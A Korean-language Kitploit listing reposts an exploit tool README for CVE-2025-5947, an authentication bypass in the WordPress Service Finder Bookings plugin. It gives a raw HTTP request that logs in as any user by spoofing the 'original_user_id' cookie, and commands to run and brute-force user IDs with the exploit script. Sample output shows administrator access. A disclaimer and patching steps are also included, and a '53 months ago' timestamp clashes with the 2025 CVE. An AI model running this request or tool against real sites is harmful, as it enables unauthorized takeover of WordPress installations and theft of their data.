Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-5947 — CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 익스플로잇 | Kitploit
도구/GitHubGitHub/xxconi/cve-2025-5947
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration Testing
GitHubxxconi/cve-2025-5947

CVE-2025-5947

CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 익스플로잇

저장소 보기
53개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-5947

CVE-2025-5947 WordPress Service Finder Bookings ≤ 6.0 Exploit

CVE-2025-5947 Exploit - Service Finder Bookings

License Python Status CVSS

WordPress Service Finder Bookings ≤ 6.0 플러그인의 인증 우회 취약점을 위한 익스플로잇 도구

📋 목차

  • 취약점 정보
  • 기술 세부사항
  • 설치
  • 사용법
  • 예제
  • 결과
  • 보안
  • 참고 자료

🔴 취약점 정보

CVE-2025-5947

Service Finder Bookings WordPress 플러그인 버전 6.0 및 이전 버전에서 중요한 인증 우회 취약점이 발견되었습니다.

🎯 영향

인증되지 않은 공격자는:

  • ✅ 모든 사용자로 로그인 가능
  • ✅ 관리자 계정에 접근 가능
  • ✅ 전체 시스템 제어 가능
  • ✅ 데이터 유출 가능
  • ✅ 악성 코드 업로드 가능

🔍 기술 세부사항

취약점 원인

service_finder_switch_back() 함수 내 불충분한 쿠키 검증이 존재합니다:

root@kitploit:~
// 안전하지 않은 코드
if(isset($_COOKIE['original_user_id'])) {
    $user_id = $_COOKIE['original_user_id'];
    wp_set_current_user($user_id);
    // 검증 없음!
}

공격 벡터

root@kitploit:~
GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
Host: target.com
Cookie: original_user_id=1

공격 특징:

  • 🌐 원격 접근 가능 (AV:N)
  • 🔓 인증 불필요 (PR:N)
  • 👤 사용자 상호작용 불필요 (UI:N)
  • 📊 완전한 영향 (C:H, I:H, A:H)

📦 설치

요구 사항

  • Python 3.6+
  • requests 라이브러리

1단계: 저장소 클론

root@kitploit:~
git clone https://github.com/xxconi/CVE-2025-5947.git
cd CVE-2025-5947

2단계: 의존성 설치

root@kitploit:~
pip install -r requirements.txt

3단계: 실행

root@kitploit:~
python exploit.py -u http://target.com

🚀 사용법

기본 명령어

root@kitploit:~
# 도움말 표시
python exploit.py -h

# 관리자(ID=1)로 로그인 시도
python exploit.py -u http://target.com

# 특정 사용자 ID로 시도
python exploit.py -u http://target.com -i 5

# 무차별 대입 (ID 1-10)
python exploit.py -u http://target.com -b 1-10

# SSL 검증 없이
python exploit.py -u http://target.com --no-ssl-verify

# 사용자 정의 타임아웃
python exploit.py -u http://target.com -t 30

매개변수

💡 예제

예제 1: 기본 익스플로잇

root@kitploit:~
python exploit.py -u http://wordpress.local

출력:

root@kitploit:~
============================================================
CVE-2025-5947 Service Finder Bookings Exploit
Authentication Bypass via Cookie Spoofing
============================================================
✅ Service Finder Bookings 플러그인 발견됨

🔍 사용자 ID 1로 로그인 시도 중...
📊 HTTP 상태: 302
📋 응답 헤더:
   Location: http://wordpress.local/wp-admin/
   Set-Cookie: wordpress_logged_in_abc123=...

✅ 성공! 관리자로 로그인됨!
📍 리디렉션: http://wordpress.local/wp-admin/

예제 2: 무차별 대입

root@kitploit:~
python exploit.py -u http://target.com -b 1-20

출력:

root@kitploit:~
🔄 무차별 대입 시작 (20명의 사용자)...
✅ 사용자 ID 1: 성공
❌ 사용자 ID 2: 실패
✅ 사용자 ID 3: 성공
...
✅ 성공한 사용자: [1, 3, 5]

예제 3: HTTPS와 SSL 검증 없이

root@kitploit:~
python exploit.py -u https://target.com --no-ssl-verify

📊 결과

성공적인 익스플로잇은 다음 지표를 포함합니다:

✅ HTTP 301 또는 302 응답 코드
✅ Location 헤더에 /wp-admin/ 포함
✅ Set-Cookie 헤더에 wordpress_logged_in_ 포함

🛡️ 보안

⚠️ 법적 고지

이 도구는 오직:

  • ✅ 승인된 보안 테스트용
  • ✅ 자신의 시스템에서
  • ✅ 서면 허가를 받은 경우에만

사용해야 합니다. 개발자는 책임을 지지 않습니다.

🔐 방어 방법

  1. 긴급 업데이트

    root@kitploit:~
    # WordPress 관리자 패널에서 업데이트
    # 또는 WP-CLI로
    wp plugin update sf-booking
    
  2. 플러그인 비활성화

    root@kitploit:~
    wp plugin deactivate sf-booking
    
  3. 플러그인 삭제

    root@kitploit:~
    wp plugin delete sf-booking
    
  4. 웹 애플리케이션 방화벽 (WAF)

    root@kitploit:~
    차단: /wp-admin/admin-ajax.php?action=service_finder_switch_back
    
  5. 보안 점검

    • 관리자 계정 확인
    • 접근 로그 검사
    • 권한 없는 로그인 조사

📚 참고 자료

  • Patchstack 데이터베이스
  • GitHub Advisory
  • NVD 상세 정보
  • 원본 익스플로잇
  • CVSS 계산기

🤝 기여하기

버그를 신고하거나 개선 사항을 제안하려면:

  1. Fork
  2. Feature branch 생성 (git checkout -b feature/improvement)
  3. 커밋 (git commit -am 'Add improvement')
  4. 푸시 (git push origin feature/improvement)
  5. Pull Request 열기

📄 라이선스

MIT License - 자세한 내용은 LICENSE 파일을 참조하세요

👤 작성자

보안 연구원

  • GitHub: @yourusername

🙏 감사 인사

  • Patchstack Security Team
  • WordPress Security Community
  • CVE Coordinators

⭐ 도움이 되셨다면 별을 눌러주세요!

🔝 맨 위로

도구 다운로드
속성값
CVE IDCVE-2025-5947
플러그인Service Finder Bookings (sf-booking)
영향받는 버전≤ 6.0
심각도🔴 치명적
CVSS 점수9.8
CWECWE-639 (인가 우회)
EPSS 점수0.617 (98.357 백분위)
발표일2025
매개변수약어설명기본값
--url-u대상 URL (필수)-
--user-id-i사용자 ID1
--brute-force-b무차별 대입 범위 (1-10)-
--no-ssl-verify-SSL 검증 비활성화False
--timeout-t요청 타임아웃 (초)10